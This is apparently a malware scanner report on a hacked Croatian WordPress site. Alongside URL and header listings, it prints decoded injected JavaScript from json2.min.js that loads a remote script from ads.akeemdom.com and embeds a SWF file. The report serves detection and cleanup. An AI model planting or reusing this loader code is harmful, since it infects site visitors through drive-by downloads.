New scan:

Malware Scanner report for 4plus-ideje.hr

Malicious/Suspicious/Total urls checked
1/1/16
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "4plus-ideje.hr" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=4plus-ideje.hr

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.4plus-ideje.hr/
HTTP/1.1 301 Moved Permanently
Cache-Control: private
Connection: close
Date: Thu, 25 Dec 2014 12:59:03 GMT
Location: http://4plus-ideje.hr/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PH_HPXY_CHECK=s1; path=/
X-Pingback: http://4plus-ideje.hr/xmlrpc.php
clean
http://4plus-ideje.hr/
200 OK
Content-Length: 32724
Content-Type: text/html
suspicious
Page code contains blacklisted domain: villalungomare.com

<!DOCTYPE html>
<html lang="hr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title> 4 plus ideje</title>
<link rel="pingback" href="http://4plus-ideje.hr/xmlrpc.php" />


<link rel="alternate" type="application/rss+xml" title="4 plus ideje &raquo; Kanal" href="http://4plus-ideje.hr/feed/" />
<link rel="alternate" type="app
...[4177 bytes skipped]...

http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=1.7.1
200 OK
Content-Length: 93868
Content-Type: text/javascript
clean
http://4plus-ideje.hr/wp-includes/js/json2.min.js?ver=2011-02-23
200 OK
Content-Length: 20342
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: ads.akeemdom.com

var JSON;
if (!JSON) {
JSON = {};
}
(function () {
"use strict";
function f(n) {
return n < 10 ? '0' + n : n;
}
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
this.getUTCFullYear() + '-' +
f(this.getUTCMonth() + 1) + '-' +

...[3757 bytes skipped]...

Decoded script:

...[544 bytes skipped]...

___ememem.id = 'frfrfr_shit';
document.body.appendChild(___ememem);

var fv = { dalink: pPetushok};
swfobject.embedSWF('./wp-includes/js/swfobjct.swf', "frfrfr_shit", "16", "16", "9.0.0", false, fv);
}
}
}


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type='text/javascript';
script.src='http://ads.akeemdom.com/db26';
script.id='yoyoyo_shit';
head.appendChild(script);

var ___scscsc = null;
var ___ememem = null;


var UU_DynScr = function(pSrc)
{
var s = document.createElement("script"); s.type = "text/javascript"; s.src = pSrc; document.head.appendChild(s); return s;
}

var UU_SinkShit = function(pPetushok)
{
___scscsc = UU_DynScr('http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject_src.js');
<
...[660 bytes skipped]...

http://4plus-ideje.hr/wp-content/themes/extensio1/js/tabs.js?ver=1.0
200 OK
Content-Length: 1464
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/tabs2.js?ver=1.0
200 OK
Content-Length: 1465
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/jquery.accordion.js?ver=1.0
200 OK
Content-Length: 16959
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/jquery.carouFredSel-5.5.0.js?ver=5.5.0
200 OK
Content-Length: 76787
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/onebyone/jquery.onebyone.js?ver=1.0
200 OK
Content-Length: 10518
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/onebyone/jquery.touchwipe.min.js?ver=1.1.0
200 OK
Content-Length: 2174
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/jquery.prettyPhoto.js?ver=3.1.3
200 OK
Content-Length: 24907
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/main.js?ver=1.1.0
200 OK
Content-Length: 26548
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/contact/languages/jquery.validationEngine-en.js?ver=1.0
200 OK
Content-Length: 10633
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/themes/extensio1/js/contact/jquery.validationEngine.js?ver=2.5.1
200 OK
Content-Length: 56587
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-includes/js/comment-reply.min.js?ver=4.1
200 OK
Content-Length: 757
Content-Type: application/javascript
clean
http://4plus-ideje.hr/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20
200 OK
Content-Length: 15248
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 4plus-ideje.hr

Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Thu, 25 Dec 2014 12:59:03 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Link: <http://4plus-ideje.hr/>; rel=shortlink
Set-Cookie: PH_HPXY_CHECK=s1; path=/
X-Pingback: http://4plus-ideje.hr/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: 4plus-ideje.hr
Referer: http://www.google.com/search?q=4plus-ideje.hr

Result:
The result is similar to the first query. There are no suspicious redirects found.